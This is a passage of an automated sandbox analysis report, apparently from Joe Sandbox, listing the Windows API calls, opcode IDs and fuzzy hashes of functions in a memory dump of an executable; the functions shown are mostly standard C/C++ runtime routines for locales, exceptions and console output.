                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 3736152602-0
                                                                                • Opcode ID: 57aedeebd0781e94346fd5e7ccfd068c661309cedef47d3bbacdea8cbf7620e8
                                                                                • Instruction ID: b68c45b142f62e52d3dc39f5124e4b33ef5b18749d00efc463be4a2dd3a846b2
                                                                                • Opcode Fuzzy Hash: 57aedeebd0781e94346fd5e7ccfd068c661309cedef47d3bbacdea8cbf7620e8
                                                                                • Instruction Fuzzy Hash: DFF0A436A00116ABDB389B64CC05FBA77A9FB40754F16482DEC06A3180EE78FE52C6D0
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • EnumSystemLocalesW.KERNEL32(00AC8D30,00000001,00000000,?,-00000050,?,00AC90D2,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00AC8A9C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                • String ID:
                                                                                • API String ID: 2417226690-0
                                                                                • Opcode ID: 907cc63199ef172dd7f6bc8dbea22cf4ec79d51833c6f3bf37f8fe8447fd3f04
                                                                                • Instruction ID: 76aedb99a14ac16d9bbeea79d1e68db25de6311ba27f11a3150341e9dcc152c5
                                                                                • Opcode Fuzzy Hash: 907cc63199ef172dd7f6bc8dbea22cf4ec79d51833c6f3bf37f8fe8447fd3f04
                                                                                • Instruction Fuzzy Hash: 40F0F6362003046FDB149F399C81F7A7B91FF807A8F07882EF9054BA80DAB59C02CB50
                                                                                APIs
                                                                                  • Part of subcall function 00ABCA85: EnterCriticalSection.KERNEL32(?,?,00AC0268,?,00AD68B8,00000008,00AC042C,?,?,?), ref: 00ABCA94
                                                                                • EnumSystemLocalesW.KERNEL32(00AC0B02,00000001,00AD6938,0000000C,00AC0F71,00000000), ref: 00AC0B47
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                • String ID:
                                                                                • API String ID: 1272433827-0
                                                                                • Opcode ID: d296348d6a10ef0cd7485db2287a5685f10502b74e4c894b0f2c78b98f423da5
                                                                                • Instruction ID: aadeedfde7bcce66e0b82963fa06ee773968e48e50363cc7d3dd7618d4cba079
                                                                                • Opcode Fuzzy Hash: d296348d6a10ef0cd7485db2287a5685f10502b74e4c894b0f2c78b98f423da5
                                                                                • Instruction Fuzzy Hash: A3F0F972A40214EFD700EF98E942F9D7BB0FB54765F10861AF811DB2A1EB759900CF50
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • EnumSystemLocalesW.KERNEL32(00AC88C5,00000001,00000000,?,?,00AC9130,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00AC89A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                • String ID:
                                                                                • API String ID: 2417226690-0
                                                                                • Opcode ID: 9e69beb4de52ce7f20fac9317422dbc7e5e0d2d7d63b638ea0d2a5d2e983ea3f
                                                                                • Instruction ID: 62b8db5b367956481551a3ba5107a8f968421231dd76aec6adb58189f88fbd10
                                                                                • Opcode Fuzzy Hash: 9e69beb4de52ce7f20fac9317422dbc7e5e0d2d7d63b638ea0d2a5d2e983ea3f
                                                                                • Instruction Fuzzy Hash: 85F0203630020597CB04DF39C845F7ABF90FB81750F0B445CEA058B680CAB59842CB90
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00ABF825,?,20001004,00000000,00000002,?,?,00ABEE27), ref: 00AC10A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 2dcd9e21a8ecb478624048756c49b4563e8b443edb32b7d6a1526096134f67ba
                                                                                • Instruction ID: 255c55e7046ac75ce2d2a32bfe5ff957261ba299ddbc9094d4a03e2d6b2fb917
                                                                                • Opcode Fuzzy Hash: 2dcd9e21a8ecb478624048756c49b4563e8b443edb32b7d6a1526096134f67ba
                                                                                • Instruction Fuzzy Hash: DCE0863164022CBBCF22AF60DD04FAE7F2AEF45750F064515FD0565222DB718D31AAD4
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000066B1,00AB5B4F), ref: 00AB66AA
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: e95276635d3c8e54ecccb8ffd82ca578c85d48345cbf68b376399b54437a6213
                                                                                • Instruction ID: e5d6996b54ff99e1e85f90b6811990487f1e58bb8e108483e1568e80c519e9c3
                                                                                • Opcode Fuzzy Hash: e95276635d3c8e54ecccb8ffd82ca578c85d48345cbf68b376399b54437a6213
                                                                                • Instruction Fuzzy Hash:
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: HeapProcess
                                                                                • String ID:
                                                                                • API String ID: 54951025-0
                                                                                • Opcode ID: b1b4e197233ac6ec6ab37fd372cb8ce61b42e8c405a8de9d0f79deede69e4d3f
                                                                                • Instruction ID: 23879934f11705bc2f80c4214f224b47a092a4c833ea651377368261bd68566b
                                                                                • Opcode Fuzzy Hash: b1b4e197233ac6ec6ab37fd372cb8ce61b42e8c405a8de9d0f79deede69e4d3f
                                                                                • Instruction Fuzzy Hash: 57A011302002008BA380CF32AA08A083BE8AA2828030EC228A000C2220EF3880A0AF02
                                                                                Similarity
                                                                                • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                • String ID:
                                                                                • API String ID: 3471368781-0
                                                                                • Opcode ID: 54a245ededfc7d1dfc6c5f735747853135f9cef35fb45bd0e51f719da1251296
                                                                                • Instruction ID: dc5057495313fd94668a271fedac481444a0014107c6d3695d95c46bfdb555d1
                                                                                • Opcode Fuzzy Hash: 54a245ededfc7d1dfc6c5f735747853135f9cef35fb45bd0e51f719da1251296
                                                                                • Instruction Fuzzy Hash: 75B1F4355007469BDB389B28CD82FB7B3A9FF44708F55452DE983C6681EE79E981CB10
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
                                                                                • Instruction ID: 6299ce6f917bfa1e4fe24487c6d46e9f98c35e98efad70b1fcea5b3459bda314
                                                                                • Opcode Fuzzy Hash: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
                                                                                • Instruction Fuzzy Hash: 64E08C32E12268EBCB14DBC8CA44E8AF3ECEB45B04B1204AAB501E3202C270DE00C7D0
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d87c33899da8d58fa6654e79c7e00a8da3c0027e1c05e394fccb95485ad6873
                                                                                • Instruction ID: 68d8e3a73fdd754f8926444451f32f6c05f46ac2a041cd94da90a1f577b6bbef
                                                                                • Opcode Fuzzy Hash: 0d87c33899da8d58fa6654e79c7e00a8da3c0027e1c05e394fccb95485ad6873
                                                                                • Instruction Fuzzy Hash: A3C08C38100A8086CF29EA1083717F833DEA392792F801E8CC4034FB83C61F9C82E700
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AB5949
                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00AB5957
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00AB5968
                                                                                • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00AB5979
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                • API String ID: 667068680-1247241052
                                                                                • Opcode ID: 2cc68ea803b20679ee83a5cc2a858d2c7e57789f8c1c946e0c6827430ea5cb52
                                                                                • Instruction ID: dbba09c4295cc0df3b63f5e441c009982e441d49f1c065cd7b4319d638b0200e
                                                                                • Opcode Fuzzy Hash: 2cc68ea803b20679ee83a5cc2a858d2c7e57789f8c1c946e0c6827430ea5cb52
                                                                                • Instruction Fuzzy Hash: 25E0B632591210EFE700DFB0ED4ED4A3AE5FA5565130A492AF505D2160DFB848418BA0
                                                                                APIs
                                                                                • type_info::operator==.LIBVCRUNTIME ref: 00AB92C7
                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 00AB93D5
                                                                                • _UnwindNestedFrames.LIBCMT ref: 00AB9527
                                                                                • CallUnexpected.LIBVCRUNTIME ref: 00AB9542
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 2751267872-393685449
                                                                                • Opcode ID: a4f610c6cee3c55b9f414f41a6d931096845c2a6f27f016afbe41a1e3f1d0fab
                                                                                • Instruction ID: a830998317164e2452afd45c039af4bcbd7ae0311506cd3ad304ec1b38d1c480
                                                                                • Opcode Fuzzy Hash: a4f610c6cee3c55b9f414f41a6d931096845c2a6f27f016afbe41a1e3f1d0fab
                                                                                • Instruction Fuzzy Hash: D6B15371800209AFCF29DFA4CA819EFBBBDBF04310F14415AEA156B217D735DA62CB91
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(01670550,01670550,?,7FFFFFFF,?,00ACBDB3,01670550,01670550,?,01670550,?,?,?,?,01670550,?), ref: 00ACBB89
                                                                                • __alloca_probe_16.LIBCMT ref: 00ACBC44
                                                                                • __alloca_probe_16.LIBCMT ref: 00ACBCD3
                                                                                • __freea.LIBCMT ref: 00ACBD1E
                                                                                • __freea.LIBCMT ref: 00ACBD24
                                                                                • __freea.LIBCMT ref: 00ACBD5A
                                                                                • __freea.LIBCMT ref: 00ACBD60
                                                                                • __freea.LIBCMT ref: 00ACBD70
                                                                                Similarity
                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                • String ID:
                                                                                • API String ID: 127012223-0
                                                                                • Opcode ID: 2e68d37f1edef7eee9b0826d2db84c83d655bb4b6fa47692ca77d81ad05cab9b
                                                                                • Instruction ID: 7e432f993ef8cdeb82bb42152988228527f26a427222b1eaee1a1a2ac98bcc3d
                                                                                • Opcode Fuzzy Hash: 2e68d37f1edef7eee9b0826d2db84c83d655bb4b6fa47692ca77d81ad05cab9b
                                                                                • Instruction Fuzzy Hash: A57114329147499BDF229FA48D93FEE77B99F09710F2A005DE806B7285EB769C008771
                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00AB35CF
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00AB35D9
                                                                                • int.LIBCPMT ref: 00AB35F0
                                                                                  • Part of subcall function 00AB3AC0: std::_Lockit::_Lockit.LIBCPMT ref: 00AB3AD1
                                                                                  • Part of subcall function 00AB3AC0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AB3AEB
                                                                                • ctype.LIBCPMT ref: 00AB3613
                                                                                • std::_Facet_Register.LIBCPMT ref: 00AB362A
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00AB364A
                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00AB3657
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                • String ID:
                                                                                • API String ID: 2958136301-0
                                                                                • Opcode ID: 9a4c0d709a1a8c295b06922bcf4f3394cd349e87df712b72185b26617d0076ae
                                                                                • Instruction ID: 392cda107e869a7c180f996cce9329452e16ba1ca7f97ab0ec41a575b40449de
                                                                                • Opcode Fuzzy Hash: 9a4c0d709a1a8c295b06922bcf4f3394cd349e87df712b72185b26617d0076ae
                                                                                • Instruction Fuzzy Hash: 84019E36D00115ABCF05EB74DA19AFEBBB9AF94710F290909F9116B393DF319E018B91
                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00AB353A
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00AB3544
                                                                                • int.LIBCPMT ref: 00AB355B
                                                                                  • Part of subcall function 00AB3AC0: std::_Lockit::_Lockit.LIBCPMT ref: 00AB3AD1
                                                                                  • Part of subcall function 00AB3AC0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AB3AEB
                                                                                • codecvt.LIBCPMT ref: 00AB357E
                                                                                • std::_Facet_Register.LIBCPMT ref: 00AB3595
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00AB35B5
                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00AB35C2
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                • String ID:
                                                                                • API String ID: 2133458128-0
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00AB8E31,00AB7403,00AB66F5), ref: 00AB8E48
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AB8E56
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AB8E6F
                                                                                • SetLastError.KERNEL32(00000000,00AB8E31,00AB7403,00AB66F5), ref: 00AB8EC1
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00AB2835
                                                                                  • Part of subcall function 00AB324A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AB3256
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00AB2845
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_$std::invalid_argument::invalid_argument
                                                                                • String ID: ios_base::badbit set$string too long$vector too long
                                                                                • API String ID: 3649684471-2138753838
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,83CA0057,?,?,00000000,00ACD374,000000FF,?,00ABE332,00000002,?,00ABE306,00ABB1B4), ref: 00ABE3D7
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00ABE3E9
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,00ACD374,000000FF,?,00ABE332,00000002,?,00ABE306,00ABB1B4), ref: 00ABE40B
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00AB519A
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00AB51A5
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00AB5213
                                                                                  • Part of subcall function 00AB52F6: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AB530E
                                                                                • std::locale::_Setgloballocale.LIBCPMT ref: 00AB51C0
                                                                                • _Yarn.LIBCPMT ref: 00AB51D6
                                                                                Similarity
                                                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                • String ID:
                                                                                • API String ID: 1088826258-0
                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00AB37DC
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00AB37E9
                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AB3826
                                                                                  • Part of subcall function 00AB5291: _Yarn.LIBCPMT ref: 00AB52B0
                                                                                  • Part of subcall function 00AB5291: _Yarn.LIBCPMT ref: 00AB52D4
                                                                                Similarity
                                                                                • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                • String ID: bad locale name
                                                                                • API String ID: 482894088-1405518554
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00AD6170,00000000,00000800,?,00AB9F33,00000000,?,?,?,?,?,00ABA05D,00000002,FlsGetValue,00ACFD48,FlsGetValue), ref: 00AB9F8F
                                                                                • GetLastError.KERNEL32(?,00AB9F33,00000000,?,?,?,?,?,00ABA05D,00000002,FlsGetValue,00ACFD48,FlsGetValue,00000000,?,00AB8EED), ref: 00AB9F99
                                                                                • LoadLibraryExW.KERNEL32(00AD6170,00000000,00000000,?,00AD6170,?,?,?,?), ref: 00AB9FC1
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID: api-ms-
                                                                                • API String ID: 3177248105-2084034818
                                                                                APIs
                                                                                • GetConsoleOutputCP.KERNEL32(83CA0057,00000000,00000000,00ABBB18), ref: 00AC2854
                                                                                  • Part of subcall function 00AC5467: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00AC489B,?,00000000,-00000008), ref: 00AC5513
                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AC2AAF
                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00AC2AF7
                                                                                • GetLastError.KERNEL32 ref: 00AC2B9A
                                                                                Similarity
                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                • String ID:
                                                                                • API String ID: 2112829910-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: AdjustPointer
                                                                                • String ID:
                                                                                • API String ID: 1740715915-0
                                                                                APIs
                                                                                  • Part of subcall function 00AC5467: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00AC489B,?,00000000,-00000008), ref: 00AC5513
                                                                                • GetLastError.KERNEL32 ref: 00AC58E7
                                                                                • __dosmaperr.LIBCMT ref: 00AC58EE
                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 00AC5928
                                                                                • __dosmaperr.LIBCMT ref: 00AC592F
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1913693674-0
                                                                                • Opcode ID: 2ae408d21de23e9fd987ff03387034830b09e8a5d4747fde0bc453be4c9647c4
                                                                                • Instruction ID: ac540ce119586199c4d9da15d97ad88f898e625cc645495ce8294d3ecdaf8b06
                                                                                • Opcode Fuzzy Hash: 2ae408d21de23e9fd987ff03387034830b09e8a5d4747fde0bc453be4c9647c4
                                                                                • Instruction Fuzzy Hash: E421B371E00A05AFDB10AFB5C980E6BB7ADEF00374712856DF9199B142EB30FC809B91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7b91b9c15a95f02022a270fea48469435bb6794fd4b87c447f722c3d5169d4a0
                                                                                • Instruction ID: e0d8d1a408de766dd03563c0ed57b376a3ceee3b5f9f9a4344d730b1938f80ed
                                                                                • Opcode Fuzzy Hash: 7b91b9c15a95f02022a270fea48469435bb6794fd4b87c447f722c3d5169d4a0
                                                                                • Instruction Fuzzy Hash: C5216A71600249AFDB20AFB1D981DEB7BADEF003647104525F9299B153FB31EC808BA1
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00AC68A2
                                                                                  • Part of subcall function 00AC5467: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00AC489B,?,00000000,-00000008), ref: 00AC5513
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AC68DA
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AC68FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 158306478-0
                                                                                • Opcode ID: efb12710d367742b8f909a7b4f879697672961ab9200e2e562ec76a809c87100
                                                                                • Instruction ID: 64f98454afc5fe759c19df14eb9844df558271820cde8518bc175617f011461a
                                                                                • Opcode Fuzzy Hash: efb12710d367742b8f909a7b4f879697672961ab9200e2e562ec76a809c87100
                                                                                • Instruction Fuzzy Hash: 4F11D2B2902615BFAB15A7BA9D89E7F6A6CDE9A3E471B012CF501D1101FA30DD4142B0
                                                                                APIs
                                                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00ACA4D6,00000000,00000001,00000000,00ABBB18,?,00AC2BEE,00ABBB18,00000000,00000000), ref: 00ACB652
                                                                                • GetLastError.KERNEL32(?,00ACA4D6,00000000,00000001,00000000,00ABBB18,?,00AC2BEE,00ABBB18,00000000,00000000,00ABBB18,00ABBB18,?,00AC3175,?), ref: 00ACB65E
                                                                                  • Part of subcall function 00ACB624: CloseHandle.KERNEL32(FFFFFFFE,00ACB66E,?,00ACA4D6,00000000,00000001,00000000,00ABBB18,?,00AC2BEE,00ABBB18,00000000,00000000,00ABBB18,00ABBB18), ref: 00ACB634
                                                                                • ___initconout.LIBCMT ref: 00ACB66E
                                                                                  • Part of subcall function 00ACB5E6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00ACB615,00ACA4C3,00ABBB18,?,00AC2BEE,00ABBB18,00000000,00000000,00ABBB18), ref: 00ACB5F9
                                                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00ACA4D6,00000000,00000001,00000000,00ABBB18,?,00AC2BEE,00ABBB18,00000000,00000000,00ABBB18), ref: 00ACB683
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                • String ID:
                                                                                • API String ID: 2744216297-0
                                                                                • Opcode ID: 9dc0b94ac787ddd29a6115e4ec070b4e21a7f4769f6de1c111f4b3d0566ec79b
                                                                                • Instruction ID: 5009b55ee2af3d6641d6db777f17f930650544fce80cbb41c0dc62fa72d8044f
                                                                                • Opcode Fuzzy Hash: 9dc0b94ac787ddd29a6115e4ec070b4e21a7f4769f6de1c111f4b3d0566ec79b
                                                                                • Instruction Fuzzy Hash: 05F01C36410159BBCF225FE1DD09E9A7F66EB183A0F064014FA1986120CB338C24EBA2
                                                                                APIs
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00AB8C7F
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00AB8D33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
